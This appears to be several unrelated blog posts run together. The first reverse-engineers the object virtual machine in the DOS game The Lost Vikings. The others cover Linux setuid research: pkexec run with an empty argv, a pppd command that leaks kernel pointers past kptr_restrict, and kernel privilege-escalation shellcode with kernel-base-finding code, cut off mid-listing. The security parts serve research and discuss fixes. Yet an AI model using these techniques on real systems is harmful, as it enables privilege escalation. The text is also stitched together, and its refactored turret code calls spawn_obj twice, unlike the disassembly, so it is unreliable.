I discovered that the Blizzard (then Silicon and Synapse) game The Lost Vikings didn’t seem to have had any serious reverse engineering attempts. It was released in 1993 at the tail end of the DOS era, and was a game I really enjoyed playing when I was younger. The Lost Vikings is a puzzle/platformer where the player controls three vikings with different skills. The vikings need to combine their skills to make their way through a number of themed worlds, including a spaceship, a prehistoric world and an Egyptian world. The following image shows the first level of the game (source: Strategy Wiki):

tlv_map01

The game seemed like it would be relatively simple to reverse. The levels are tile map based and contain some simple puzzles such as buttons that activate or disable objects, movable boxes, and a crane that can pick up objects. Indeed, much of the reverse engineering project was straightforward. There is a single data pack file, which contains compressed file chunks. The chunks encode various game assets such as sprites, maps, sounds, etc. I’ve written a collection of tools which can be used to view the game assets: The Lost Vikings Tools.

The Virtual Machine

One interesting aspect of how the game engine works is that the objects in the game use a template class system. There is a chunk in the data file for each world that defines a set of object classes. For example, in the first level image above both of the hazard doors are class type 0x4f. Reverse engineering the object class code led to this function:

func_caller

Ignoring for now the alternative path into location 0x142a2, this code is using si as an index into the object classes array structure (each class template is 0x15 bytes). The word at offset 0x3 in this structure is used as an address in the ES segment. The ES segment actually contains the entire object class template chunk data. The code then moves into the loop at address 0x142a6. This loop fetches the next byte from the ES segment and uses it as an index to a function table. At each step in the loop bx contains the address in the ES segment, and si contains the current opcode.
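
Reconstructed in C, the dispatch loop is roughly equivalent to the following sketch (the names are mine; the real code keeps the program bytes in the ES segment and the instruction pointer in bx):

#include <stdint.h>

typedef void (*opcode_handler)(void);

/* Names are mine; the real code keeps the program in ES and the
 * instruction pointer in bx. */
static opcode_handler opcode_table[256];
static uint8_t *vm_program;   /* object class template chunk data */
static uint16_t vm_ip;        /* virtual machine instruction pointer */

static void run_object_program(uint16_t start)
{
    vm_ip = start;

    /*
     * The loop never terminates by itself; as described below, an
     * opcode handler escapes it by discarding its return address.
     */
    for (;;) {
        uint8_t opcode = vm_program[vm_ip++];

        opcode_table[opcode]();
    }
}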

An interesting thing to note here is that the loop is using an unconditional jump and therefore will never terminate. At least, not normally. It appears that each object class has some form of opcode based program associated with it, which is interpreted by this function. My initial approach was to just start looking at some of the functions in the call table. The first one looks like this in IDA’s graph mode:

vm_func_01_graph

IDA’s stack analysis has failed here, and with good reason. Popping ax as the first instruction in a function is pretty weird. The x86 call instruction pushes the instruction pointer (ip) onto the stack, and the ret instruction pops it to return to the calling function. The pop instruction here is effectively discarding the return address, which means the next ret instruction will jump back two stack frames instead of one. This opcode will exit the infinite interpreter loop.

To see how the opcode is really implemented we need to switch to the linear view in IDA:

vm_func_01_linear

I’ve annotated the names of the functions with their corresponding opcode numbers to make this code section clearer. There is a little bit of clever code reuse going on here. It’s easiest to start by looking at opcode 0x03. Recall that the loop which is handling opcodes has the object classes chunk data loaded in the ES segment, and bx is being used as the VM instruction pointer. Opcode 0x03 is therefore an unconditional jump instruction. It loads the word at the current instruction pointer, sets the instruction pointer to it, and then returns to the opcode handler loop.

Working backwards, opcode 0x05 skips the next word operand and stores the next address into an array. Reversing other functions shows that word_28522 is the index of the current object instance, so this opcode can store a single address for each object in the level. It then restores the value of bx and falls through into the code for opcode 0x03 (jump). So this opcode appears to be a very limited call instruction with only a single level of stack.

Opcode 0x00 stores the current instruction pointer in a global array. Note that this is different to opcode 0x05, which stores the address after the call address operand. It then falls into the call opcode handler. The jump however won’t actually be executed because of the initial pop instruction. Instead the calling loop will exit. The address saved by this instruction is used as the alternate entry path to the function calling loop that I ignored earlier. Opcode 0x00 is therefore acting as a sort of co-routine style exit. It stores the current position in the program, and exits the opcode handler loop, allowing the game engine to do other things such as update graphics and receive input before returning to where the virtual machine program left off. This allows a virtual machine program to perform complex tasks without stalling the rest of the game engine.

Disassembling Opcodes

At this point I had a general feel for how the virtual machine opcode handlers worked. Looking at the function call table there are around 215 implemented opcodes, so rather than just reversing them in order I started writing a simple script to decompile a program for a given object class so that I could focus on just the opcodes being called by objects in the first level.

At this point I am mostly trying to determine how many operands an opcode has, and what its basic functionality is. If an opcode handler is short then I will generally try to fully understand what it does. If it is more than a few blocks of code then I will just try to figure out how many operands it has and whether or not it does a conditional jump or call. The reason for this is that sometimes an opcode’s function becomes apparent from surrounding context in the disassembled program, which is often quicker than reversing the code.

The following is a simple opcode:

vm_func_51

This opcode takes a word operand and stores it in a global. Reversing other functions shows that this global is a general purpose temporary storage location, or register. The virtual machine only has one such register, but it also has this opcode:

vm_func_57

This opcode stores the current value of the general purpose register at the address in the data segment (DS) specified by the word operand. The programs in the game’s data file use this opcode to write to specific parts of the game data such as the inventory slots for the vikings. A few DS offsets are also used as additional temporary values when more than one is required. Offsets 0x0206 and 0x0208 are often used as temporary x and y coordinates of an object for example.

What makes this opcode, and its counterpart opcode 0x53 which reads from DS into the general purpose register, interesting is that it can read and write any game data in DS, not just what was intended by the original game creators. It makes extending the original game an interesting prospect.

A more complex opcode is 0x14:

vm_func_14

At first glance this looks straightforward to reverse. It fetches a byte operand, and calls a pair of sub-functions. It then fetches another byte operand and calls the same sub-functions again. Looking at the first sub-function (sub_15473) though, things get a bit more complicated:

vm_func_14_internal

IDA’s stack analysis has failed again, and it shows four exits from this block which I have cropped out because they are all incorrect. What is actually happening is that the first byte operand is passed into this function in ax, which is then used as an index into a jump table. Although ax is and’ed with 7, there are actually only 4 valid entries in the jump table. Looking at type 0 in the jump table we see:

vm_func_14_jump_00

Which loads an immediate word operand. This function snippet does a retn, which returns from the top-level opcode 0x14 handler. It’s not hard to see why IDA is struggling with disassembling this code correctly.

The other entries in the jump table load values in different ways, and then each also does a retn. Type 1 takes a byte operand which is used as an object field index. Objects have fields for things like the x and y offset, flags, etc. Type 2 takes a word operand and loads a value from DS (like opcode 0x53 above). Type 3 takes a byte operand and loads a field of a target object, used for actions such as collision detection.

Moving back to the top-level opcode 0x14 handler the next thing which is called is sub_15470. This is only three bytes before the first sub-function which was called. Again it is a clever code optimisation. This sub-function simply shifts ax right by 3 and then falls into the code we just reversed above. So the first byte operand of opcode 0x14 is used to encode how two further arguments are fetched. Reversing the handling of the second byte operand shows that it functions the same way.

After fetching all its (variable length) operands the handler for opcode 0x14 then calls sub_13809. I won’t paste the code here because the function is somewhat large, and calls a bunch of other sub-functions, all of which are also large. This is one of those instances where I just didn’t bother reversing what the function did because I was later able to guess it from context.

CISC Virtual Machine

The instructions in The Lost Vikings virtual machine are variable length. In the case of opcode 0x14, and other similar opcodes, determining the length requires decoding some of the operands. Having variable length instructions means that programs need to be iteratively disassembled, determining at least the number of operands for each new opcode in the program. If the opcodes were all fixed length it would be possible to skip opcodes that were unknown.

There are also instructions which perform common operations that many programs use. For example, many programs add or subtract from the current position of the object based on its direction. This could be encoded as several instructions, but opcode 0x91 takes a single word operand as an offset in DS and then adds or subtracts the current temporary register value from it based on the current object's horizontal direction (flag 0x0040). The following pseudo code illustrates the operation of opcode 0x91.

if (this.flags & 0x0040)
    DS[operand] -= var;
else
    DS[operand] += var;

This results in far fewer bytes in the encoding, especially since this operation is performed by several of the programs. Back in the DOS days, when disk space and computation time were at a premium, this made perfect sense. For the modern day reverser it simply adds a bunch more opcodes that need to be understood.

Disassembly Tool

I wrote a simple Python script which can disassemble the virtual machine programs into something that looks vaguely like C. It works by linearly decoding instructions in the program, storing jump and call addresses. When it hits an instruction which terminates or redirects code flow, such as a return or unconditional jump, it stops and checks to see if there are any unvisited addresses in the program.

The developers have used similar optimisation tricks in the virtual machine programs to the ones used in the game binary. For example, some exit paths of subroutines in the virtual machine programs are reused by jumping to them from other subroutines. The disassembler works around this by decoding the instructions twice, so two subroutines may have code with the same addresses.

The disassembler is able to squash accesses to the temporary register to make the resulting code more readable. For example the virtual machine programs often contain sequences like:

var = 0x1000;
obj->field_10 = var;

Which the disassembler will refactor to:

obj->field_10 = 0x1000;

The disassembler does not attempt to refactor code blocks into constructs like if or while blocks, so the resulting programs are spaghetti code. Some of the larger programs become a reversing project in their own right.

A complete program

I started with the program for the gun turret in the top-left of the first level (object class 0x04). It seemed like it should be a fairly simple program. The gun turret shoots bullets at a fixed interval, and it cannot be destroyed by the vikings. The following shows the output of my disassembler. Above each opcode is a comment showing the address in square brackets, the opcode in parens and then the operands.

The turret program looks like this:

main_374d:
{
    // [374d] (19) 37bc
    this.field_21 = 0x37bc;
    this.field_22 = 0x0001;

    // [3750] (97) 00 01
    if (0x0001 & (1 << 0))
        var = 0x0001;

    // [3753] (00)
    this.save_state();

    // [3754] (9c) 18 08
    if (!(var))
        this.db_flags &= ~(1 << 12);

label_3757:
    // [3757] (2f)
    vm_func_2f();

    // [3758] (00)
    this.save_state();

    // [3759] (01)
    nop();

    // [375a] (51) 0000
    // [375d] (8c) 30 3798
    if (this.field_30 != 0x0000)
        call sub_3798;

    // [3761] (52) 1c
    // [3763] (77) 0000 3757
    if (this.update_time != 0x0000)
        jump label_3757;

    // [3768] (19) 37c8
    this.field_21 = 0x37c8;
    this.field_22 = 0x0001;

    // [376b] (52) 1e
    // [376d] (57) 0206
    g_tmp_a = this.xoff;

    // [3770] (51) 0004
    // [3773] (91) 0206
    if (this.flags & 0x0040)
        g_tmp_a -= 0x0004;
    else
        g_tmp_a += 0x0004;

    // [3776] (52) 20
    // [3778] (57) 0208
    g_tmp_b = this.yoff;

    // [377b] (51) fff8
    // [377e] (5a) 0208
    g_tmp_b += 0xfff8;

    // [3781] (51) 001e
    // [3784] (56) 1c
    this.update_time = 0x001e;

    // [3786] (02) 3030
    vm_func_02(0x3030);

    // [3789] (14) 12 0206 0208 00 0000 0000 05
    new.x = g_tmp_a;
    new.y = g_tmp_b;
    new.unknown_a = 0x0000;
    new.unknown_b = 0x0000;
    new.unknown_c &= 0x801;
    new.type = 0x05;
    spawn_obj(new);

    // [3795] (03) 3757
    jump label_3757;

}

sub_3798:
{
    // [3798] (51) 000a
    // [379b] (73) 30 37a5
    if (this.field_30 == 0x000a)
        jump label_37a5;

    // [379f] (51) 0000
    // [37a2] (56) 30
    this.field_30 = 0x0000;

    // [37a4] (06)
    return;

label_37a5:
    // [37a5] (52) 32
    // [37a7] (69) 0a 37ba
    if (this.argument < this.field_32)
        jump label_37ba;

    // [37ab] (52) 32
    // [37ad] (5c) 0a
    this.argument -= this.field_32;

    // [37af] (51) 0000
    // [37b2] (56) 30
    this.field_30 = 0x0000;

    // [37b4] (51) 0000
    // [37b7] (56) 32
    this.field_32 = 0x0000;

    // [37b9] (06)
    return;

label_37ba:
    // [37ba] (0e)
    vm_func_0e();

    // [37bb] (10)
    this.update();
}

There are a few things to note here:

  • The this.save_state() function is opcode 0x00. It acts as a yield, allowing the program to save where it was and return to the game engine code.
  • My disassembler names some of the object fields that I had worked out. In this program you can see that xoff, yoff, flags and update_time are named.
  • Similarly DS offsets that are known are also named. g_tmp_a and g_tmp_b are DS offsets 0x0206 and 0x0208.
  • Opcode 0x14 is used here. I’ve named it spawn_obj(), because from context it is used to spawn a new bullet object each time the turret fires.
  • Opcode 0x19 is assigning to object fields 0x21 and 0x22. Notably, field 0x21 is being assigned a value that looks like a program address. From reading the code and experimentation, this address is actually an offset for instructions in a smaller secondary virtual machine which controls how the object's graphics are displayed. I’ve not yet reversed this code.

Refactoring the program makes it easier to understand what is going on:

main_374d:
{
    /* Turret initialisation */
    this.set_graphics_prog(0x37bc);

    if (0x0001 & (1 << 0))
        var = 0x0001;

    this.save_state();

    if (!(var))
        this.db_flags &= ~(1 << 12);

label_3757:
    /*
     * Main loop for the turret. This yields to the main
     * game engine on each iteration.
     */
    while (1) {
        vm_func_2f();
        this.save_state();

        /*
         * The functionality of this is unknown. The this.argument
         * field can be set for an object instance in the level
         * header. It may be used to make some turrets behave
         * slightly differently.
         */
        if (this.field_30 != 0x0000) {
            if (this.field_30 != 0x000a) {
                this.field_30 = 0x0000;
            } else {
                if (this.argument < this.field_32) {
                     vm_func_0e();
                     this.update();
                } else {
                    this.argument -= this.field_32;
                    this.field_30 = 0x0000;
                    this.field_32 = 0x0000;
                }
            }
        }

        /* If the update time reaches zero then fire a bullet */
        if (this.update_time == 0x0000) {
            this.set_graphics_prog(0x37c8);
             
            /* Reset the update time */
            this.update_time = 0x001e;
        
            vm_func_02(0x3030);
                          
            /*
             * Spawn a bullet object 4 pixels in front of the
             * turret and 8 pixels above its center line.
             */
            if (this.flags & OBJ_FLAG_FLIP_HORIZONTAL)
                new.x = this.xoff - 4;
            else
                new.x = this.xoff + 4;
            new.y = this.yoff - 8;
            new.unknown_a = 0x0000;
            new.unknown_b = 0x0000;
            new.unknown_c &= 0x801;
            new.type = 0x05;
            spawn_obj(new);
            spawn_obj(new);
        }
    }
}

Note that there are still a few sections of the program and some opcodes that I have not identified the function of, but the behaviour of the turret can be easily seen. The update_time object field is used to encode the rate the turret fires at. The program itself does not (at least obviously) decrement this value. Possibly one of the unknown opcodes performs this operation, or some part of the main game engine may do it.

Game Hacking

Being able to view the original programs used by the game is interesting, but the cool part about having a virtual machine implementing the object behaviour is the possibility of modifying or creating new programs. This would be much easier if I were to write a compiler (todo list), but for now this requires poking values manually in a hex editor.

Again I chose to modify the gun turret program since it is quite simple. My first idea was to change the object type that the turret shoots. I had mixed success with this. Attempting to make it shoot some objects, like the green alien, will just result in the game crashing or freezing. Other object types just result in the turret shooting nothing. I was able to make it shoot fire arrows (these are normally a power-up that one of the vikings can use). It is also easy to make the turret shoot more quickly, by lowering the value of the update_time field.

The second modification I made was a bit more ambitious: making the turret walk instead of shoot. The opcode (0x14) for spawning the bullet is quite long:

14 12 0206 0208 00 0000 0000 05

The virtual machine (quite generously) provides a single byte nop instruction (0x01), which can be used to remove this instruction. The instructions above have already set DS[0x0206] to the current x position of the turret plus or minus 4 based on its direction, so I just needed to add instructions to set the current x position to that value. This requires only two instructions:

53 0206   // var = DS[0x0206];
56 1e     // this.x = var;

With this change the turret will walk, but will not be obstructed by anything. I did attempt to make it do collision detection and turn around, but I couldn’t get it to work properly. More reversing required.

I put together a small video showing the modifications:

I’ve also made my disassembler tool available:

https://github.com/RyanMallon/TheLostVikingsTools/blob/master/dissassembler/lv_vm_disasm.py

argv silliness

Most C programmers should be aware that the argv argument to main() is a NULL-terminated list of strings, where the first element is the name of the program. On Linux there is an odd “feature” which allows this list to be empty. From the Linux execve(2) manpage:

On Linux, argv can be specified as NULL, which has the same effect as specifying this argument as a pointer to a list containing a single NULL pointer. Do not take advantage of this misfeature! It is non standard and non portable: on most other UNIX systems doing this will result in an error (EFAULT).

This allows us to execute an application with argv[0] == NULL. Many applications, including several setuid applications, make the assumption that argv[0] is always a valid pointer. While I haven’t found any potential exploits using this, it does allow for some amusing behaviour from setuid binaries.
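Triggering this from C just means handing execve() an argv array whose only element is the terminating NULL pointer. A minimal sketch (the target path is a placeholder and error handling is omitted):

/*
 * Exec a target with an empty argv list: the child sees argc == 0
 * and argv[0] == NULL.
 */
#include <stdio.h>
#include <unistd.h>

int main(void)
{
        char *argv[] = { NULL };
        char *envp[] = { "FOO=aaaaaaaaa", NULL };   /* single dummy variable */

        execve("/path/to/target", argv, envp);      /* placeholder path */
        perror("execve");
        return 1;
}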

First we want to set up an easy-to-use environment for calling execve() and trapping the executed process in a debugger. Python's os library will let us call execve() with an empty argv list, so we start a Python interpreter and get its pid so that we can attach a debugger to it:

$ python
>>> import os
>>> os.getpid()
18452

On Linux gdb is able to catch fork and exec events and attach the debugger to the forked or execed process. There is a full description of these features here. For this example, we just need to catch the exec event and attach to the new process. The default settings for gdb will stop execution at the beginning of the exec’ed process (note that you will need to run gdb as root if you want to catch an exec of a setuid binary):

$ gdb
(gdb) catch exec
(gdb) attach 18452
(gdb) c

The debugger is now attached to the Python shell. We now need to pick a target binary to execute. Unfortunately many setuid binaries do the following somewhere early on in main():

progname = basename(argv[0]);

With the POSIX version of basename() this would be okay, since the standard says that passing a NULL pointer will return the string “.”. The basename() function has some historical clunkiness. Because it returns a string, rather than using a user supplied buffer and length, implementations may modify the path name argument in place. The GNU C library attempted to fix this by providing their own version, also called basename() to avoid confusion. One difference, which the basename(3) manpage fails to mention, is that GNU basename() will segfault if passed a NULL pointer.
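The difference is easy to demonstrate with a small test program. Which basename() you get depends on the headers: <libgen.h> declares the POSIX version, while <string.h> with _GNU_SOURCE defined gives the GNU version (a sketch; build it both ways to see the behaviour):

/*
 * With the GNU basename() from <string.h> this crashes when argv[0]
 * is NULL; swapping the include for <libgen.h> selects the POSIX
 * version, which returns "." for a NULL argument.
 */
#define _GNU_SOURCE
#include <string.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
        printf("progname = %s\n", basename(argv[0]));
        return 0;
}

Run normally it just prints the program name; exec it with an empty argv list, as above, and the GNU build crashes inside basename().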

After searching around on a stock Ubuntu system for setuid binaries that looked promising for passing argv[0] == NULL to, I found pkexec. pkexec is part of the Polkit package, and allows a binary to be executed as another user (similar to sudo). We call execve() passing an empty argv list and a single dummy environment variable:

>>> os.execve("/usr/bin/pkexec", [], {"FOO":"aaaaaaaaa"})

The exec event is caught, and gdb will stop inside the pkexec binary in the function _start():

process 18452 is executing new program: /usr/bin/pkexec

Catchpoint 1 (exec'd /usr/bin/pkexec), 0x00007f634eafc6b0 in _start ()
   from /lib64/ld-linux-x86-64.so.2
(gdb) where
#0  0x00007f634eafc6b0 in _start () from /lib64/ld-linux-x86-64.so.2
#1  0x0000000000000000 in ?? ()

There is a bunch of stuff that happens before main() is called. We want to break on the function __libc_start_main(), which is what calls main():

(gdb) b __libc_start_main
(gdb) c
Continuing.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 3, __libc_start_main (main=0x402010, argc=0, 
    ubp_av=0x7fff44607b98, init=0x403660, fini=0x4036f0, 
    rtld_fini=0x7f7a3ad43740 <_dl_fini>, stack_end=0x7fff44607b88)
    at libc-start.c:96

When a process is executed, the arguments and the environment are passed in the ubp_av argument as one contiguous chunk of memory, with a NULL pointer separating the two. The __libc_start_main() function separates them out as follows (simplified):

#define argv ubp_av
char **envp = &ubp_av[argc + 1];

In gdb we can see that the environment is immediately after argv, which contains only a single NULL pointer:

(gdb) p *ubp_av
$1 = 0x0
(gdb) p *(ubp_av + 1)
$2 = 0x7fff44607fda "FOO=aaaaaaaaa"

Looking at the main() function for pkexec we see that it parses its command line arguments as follows (simplified):

for (n = 1; n < (guint) argc; n++)
  {
    ...
  }

  ...
 
path = g_strdup (argv[n]);
if (path == NULL)
  {
    usage (argc, argv);
    goto out;
  }

We never enter the body of the for loop because argc == 0, so at the end of the loop n == 1. Since the environment block begins immediately after argv's terminating NULL, argv[1] is the same memory location as envp[0], which means that g_strdup() copies from the environment rather than argv, resulting in this:

Cannot run program FOO=aaaaaaaaa: No such file or directory

By creating an executable in the local directory called “FOO=aaaaaaaaa” we can get pkexec all the way to actually trying to run it. However, because we can’t pass any option arguments, the executing user will default to root, which presumably we don’t have the password for. Although getting a setuid binary to use envp in place of argv is amusing, a quick skim of the pkexec source doesn’t show anything that is likely to be vulnerable to having argv[0] be NULL. For a binary to be vulnerable would probably require some reasonably unorthodox code. That said, a number of binaries, notably the sudo suite, do protect against the case where argc == 0.
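The defence is cheap. Something along these lines at the top of main() is the kind of check that sudo does (a sketch, not sudo's actual code):

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
        /*
         * Refuse to run with an empty argument list rather than
         * assuming argv[0] is a valid pointer.
         */
        if (argc < 1 || argv[0] == NULL) {
                fprintf(stderr, "invalid argument list\n");
                exit(EXIT_FAILURE);
        }

        /* ... normal option parsing ... */
        return 0;
}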

kptr_restrict – privilege checks

In the Linux kernel, kptr_restrict is used to protect sensitive kernel pointer values by printing them as zeros when a kernel-provided file (e.g. something under /sys or /proc) is read by a non-privileged user. This is implemented with a printf extension called “%pK”. Typically code prints to a /sys or /proc file using the seq_file interface. For example:

seq_printf(m, "secret pointer = %pK\n", secret_pointer);

When kptr_restrict is enabled and a file using this interface is read, a check is done to see whether the reading user has CAP_SYSLOG. If so, the real pointer value is printed; otherwise zeros are printed.
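Roughly speaking, the %pK handling boils down to something like the following (a heavily simplified sketch of the logic, with a made-up helper name, not the actual lib/vsprintf.c code):

/*
 * Simplified sketch: when kptr_restrict is set, replace the pointer
 * with NULL (which prints as zeros) unless the current task has
 * CAP_SYSLOG. The check runs when the value is formatted, i.e. when
 * the file is read.
 */
static const void *restrict_pointer(const void *ptr)
{
        if (kptr_restrict && !has_capability_noaudit(current, CAP_SYSLOG))
                return NULL;

        return ptr;
}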

This deviates from the normal UNIX file privilege model, where file permissions are checked at open time, not read time. This becomes a problem when a setuid binary reads a file which uses %pK to protect sensitive pointers. Setuid binaries which need to open files will typically drop privileges to open the file. This ensures that only files which the real user has access to will be opened. Once the file is opened, the setuid binary can re-elevate its privileges.

Consider the code pppd uses to parse its options file, in pppd/options.c:options_from_file():

euid = geteuid();
if (check_prot && seteuid(getuid()) == -1) {
    option_error("unable to drop privileges to open %s: %m", filename);
    return 0;
}
f = fopen(filename, "r");
err = errno;
if (check_prot && seteuid(euid) == -1)
    fatal("unable to regain privileges");

The effective user id is set to the real user id and then the options file is opened. Only a file readable by the real user can be opened here. Once the file has been successfully opened, the pppd binary immediately re-elevates privileges. Looking a few lines down in the code we see this:

while (getword(f, cmd, &newline, filename)) {
    opt = find_option(cmd);
    if (opt == NULL) {
        option_error("In file %s: unrecognized option '%s'",
                     filename, cmd);
        goto err;
    }
    ...

The pppd option parser reads commands, and will print out an error if the command is not valid.

The problem is that %pK checks privileges when the file is read, not when it is opened. Most files which use %pK are world readable, so they will pass the open check in pppd. But when the read is done pppd is running as root, so the %pK protection is not in effect. Which means we can do this:

$ head -1 /proc/kallsyms 
00000000 T startup_32 
$ pppd file /proc/kallsyms
pppd: In file /proc/kallsyms: unrecognized option 'c1000000'

Unfortunately pppd bails on the first error in the file, so we can't get it to dump the full contents of /proc/kallsyms. It is useful for one-liner %pK files such as those in /sys/module/<module>/sections/* though. Most setuid applications avoid printing anything from opened files, pppd being the only one I could find in a stock Ubuntu 12.04 installation. If you get lucky though, you might find a less paranoid setuid binary which will happily write out the full contents of a file under the assumption that the real user must be able to read it anyway.

The quick and dirty fix to this issue is to check that, in addition to having CAP_SYSLOG, the real and effective uids and gids are equal before printing the real %pK values. That fix has been merged into mainline Linux here.

The better long-term fix is to do the privilege check at open time and store the result as part of the seq_file structure. Rather than using %pK, a function should be used which checks the stored privilege. For example:

seq_printf(m, "secret pointer = %p\n", 
           seq_secret_pointer(m, secret_pointer));

The seq_secret_pointer function should return NULL if the user which issued the open does not have CAP_SYSLOG. Unfortunately, fixing this is not entirely straightforward. Most users of %pK are using the seq_file interface, and can be easily converted. There are a handful of %pK uses in printk statements, which are basically just incorrect, since no sane permission check can be done (nobody opens printk). There is already a protection mechanism for printk, called dmesg_restrict, so the printk uses can simply be changed to %p. The only remaining problem is the module sections files (see above), which use the traditional-style sysfs show function rather than a seq_file (see kernel/module.c: module_sect_show()). Some thought needs to go into how to refactor that code in order to store the open-time privileges.
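As a sketch of what the seq_file conversion could look like (hypothetical code, not an existing kernel API; the file and helper names are made up), the open handler records the opener's privilege in the seq_file private data and seq_secret_pointer() consults it later:

/* Hypothetical sketch: cache the opener's privilege at open time */
struct secret_priv {
        bool can_see_pointers;
};

static const void *seq_secret_pointer(struct seq_file *m, const void *ptr)
{
        struct secret_priv *priv = m->private;

        return priv->can_see_pointers ? ptr : NULL;
}

static int secret_show(struct seq_file *m, void *v)
{
        /* secret_pointer is the value from the earlier example */
        seq_printf(m, "secret pointer = %p\n",
                   seq_secret_pointer(m, secret_pointer));
        return 0;
}

static int secret_open(struct inode *inode, struct file *file)
{
        struct secret_priv *priv;

        priv = kzalloc(sizeof(*priv), GFP_KERNEL);
        if (!priv)
                return -ENOMEM;

        /* The privilege check now happens at open time */
        priv->can_see_pointers = capable(CAP_SYSLOG);

        return single_open(file, secret_show, priv);
}

(The matching release hook would need to free priv; that is omitted here for brevity.)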

kptr_restrict – Finding kernel symbols for shell code

A common approach to getting a root shell from an exploit which grants execution in the kernel is to jump to a user controlled function which does the following:

commit_creds(prepare_kernel_cred(NULL));

These kernel functions will create a new credential structure with root privileges, and then commit that credential structure to the current process. After returning to user-space, a root shell can be spawned.
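In practice the user-controlled function tends to look something like the sketch below. The function pointer types are stand-ins for the kernel prototypes (void * replaces struct cred, which isn't visible from user-space), and the pointers still need to be filled in with real kernel addresses:

/* Sketch of a typical privilege escalation payload */
typedef void *(*prepare_kernel_cred_fn)(void *daemon);
typedef int (*commit_creds_fn)(void *new_cred);

static prepare_kernel_cred_fn prepare_kernel_cred;
static commit_creds_fn commit_creds;

/* Called while executing in kernel mode via the exploit */
static void get_root(void)
{
        commit_creds(prepare_kernel_cred(NULL));
}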

Before doing all this, the attacker needs to know the addresses of the kernel functions. Helpfully, the Linux kernel provides a user-readable file called /proc/kallsyms, which lists the addresses of the kernel's symbols. An unprivileged attacker can use this file to get the addresses of the kernel functions needed for the shell code. For example:

$ grep prepare_kernel_cred /proc/kallsyms | head -1
84056fec T prepare_kernel_cred

Being able to do this as an unprivileged user has more recently been viewed as undesirable (at least by the mainline kernel developers), because it hands internal kernel information to attackers. As such, there was discussion around making /proc/kallsyms unreadable, which eventually resulted in a feature called kptr_restrict being added to the kernel.

kptr_restrict is a sysctl which makes pointer values printed with “%pK” appear as zero, unless you have CAP_SYSLOG. With it enabled, we get the following instead:

$ grep prepare_kernel_cred /proc/kallsyms | head -1
00000000 T prepare_kernel_cred

Which is much less useful to a would-be attacker. In the initial discussion about hiding /proc/kallsyms, a few people pointed out that most installations run distro kernels, so attackers can simply hard-code the addresses of the necessary functions. Indeed, this is what a number of PoC exploits now do, sometimes with a small table for targeting a few different kernels. This works, but it significantly reduces the number of machines the exploit will work against.

I wanted to try and find a generic, portable method for finding the kernel symbols even with kptr_restrict enabled. For this example, I am assuming that an attacker has already gained kernel mode code execution, and needs a reliable way to find the addresses of the kernel functions required for the shell code. Note that once you have code execution you have really already won, and kptr_restrict and many other protections cease to be fully effective. kptr_restrict is still effective against other forms of attack, such as arbitrary writes. The method I'm presenting here is just one possible way to get the kallsyms addresses once executing in kernel mode.

I started by looking at what information can be gathered about the kallsyms. Although kptr_restrict hides the most useful information, the symbol addresses, an unprivileged user can still read the file and collect some information about the symbols, including:

  • The names of the symbols
  • The number of symbols
  • The order that they appear in the kernel’s kallsyms table

The first thing to note is that the kallsyms table is large: there are around seventy thousand built-in symbols on my desktop machine. Since we know the order and names of the symbols, we can probably search for a matching table in the kernel's memory. The sheer size and uniqueness of the table makes it all but certain that any match is the table we are looking for. So let's look at how the kernel stores the table. From kernel/kallsyms.c:

extern const unsigned long kallsyms_addresses[] __attribute__((weak));
extern const u8 kallsyms_names[] __attribute__((weak));

The __attribute__((weak)) part is a gcc directive which marks the symbols as weak, meaning that any other definition of these symbols will supersede these ones. This doesn't matter for our purposes, since either way the arrays will be in the data section. Looking through the code in kernel/kallsyms.c we can see that kallsyms_addresses is an ordinary array, but kallsyms_names is a compressed string table. We also note that the arrays in kernel/kallsyms.c only store the built-in symbols; module symbols are stored elsewhere.
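As I understand the layout (for kernels of this vintage), each kallsyms_names entry is a length byte followed by that many token indexes, each of which expands to a short string via a 256-entry token table; the first expanded character is the symbol type. Expanding a single entry looks roughly like this (a sketch modelled on kernel/kallsyms.c:kallsyms_expand_symbol(), not the exact code):

extern const u8 kallsyms_token_table[];  /* concatenated NUL-terminated tokens */
extern const u16 kallsyms_token_index[]; /* 256 entries: offset of each token */

static unsigned int expand_symbol(const u8 *names, unsigned int off,
                                  char *result)
{
        int len = names[off++];

        while (len--) {
                const u8 *token =
                        &kallsyms_token_table[kallsyms_token_index[names[off++]]];

                while (*token)
                        *result++ = *token++;
        }
        *result = '\0';

        return off;     /* offset of the next entry in kallsyms_names */
}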

Before attempting to match the kallsyms name table, we first need to create a compressed version of it. Fortunately there is some code already provided for this in scripts/kallsyms.c. scripts/kallsyms normally runs during the Linux kernel build, taking the System.map file as input and generating an assembler file as output. Looking at the System.map file we see that it has the same format as /proc/kallsyms, so we can reuse scripts/kallsyms.c with only a few small modifications:

  • We don’t want to sort the symbols in the input file, since /proc/kallsyms is already sorted.
  • We want to skip module symbols from /proc/kallsyms. These can be identified by having “[module_name]” at the end of the string.
  • We want to create an in memory copy of the name table, rather than writing it to a file.

By doing that we can create an exact copy of the kallsyms_names array in user-space. The next step is to find it once we are executing in kernel mode. The kallsyms_names array is in the data section, which is at the base of the kernel's memory. Before searching for it, we need to find out where the kernel actually resides, since its location depends on the architecture and the VM split. We can determine the address of the kernel by attempting to mmap addresses where the kernel might be, starting with low addresses and working our way up. If an mmap call fails, then chances are that the kernel resides there:

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>

#define ARRAY_SIZE(a)   (sizeof(a) / sizeof((a)[0]))

static unsigned long *kernel_base;

static void find_kernel_base(void)
{
        unsigned long addrs[] = {
                0x80000000,
                0xc0000000,
#ifdef X64
                0xffffffff81000000,
#endif
        };
        void *map;
        int i;

        for (i = 0; i < ARRAY_SIZE(addrs); i++) {
                map = mmap((void *)addrs[i], 0x1000, PROT_NONE,
                           MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
                if (map == MAP_FAILED) {
                        kernel_base = (unsigned long *)addrs[i];
                        printf("Guess kernel base @ %p\n", kernel_base);
                        return;
                }
                munmap((void *)addrs[i], 0x1000);
        }

        printf("Can't guess kernel base\n");
        exit(EXIT_FAILURE);
}

The kallsyms_names array resides in the kernel’s data section, which is at the base of its memory. We don’t know the exact location, but that doesn’t matter because the kernel’s low memory is always contiguously mapped. We should be able to scan about 16MB from the kernel’s base on most architectures without problem.

When trying to match the table, we first do a partial match to speed things up. Here is the first part of our shell code which runs in kernel space:

#define KERNEL_LOWMEM_SIZE (16 * 1024 * 1024)
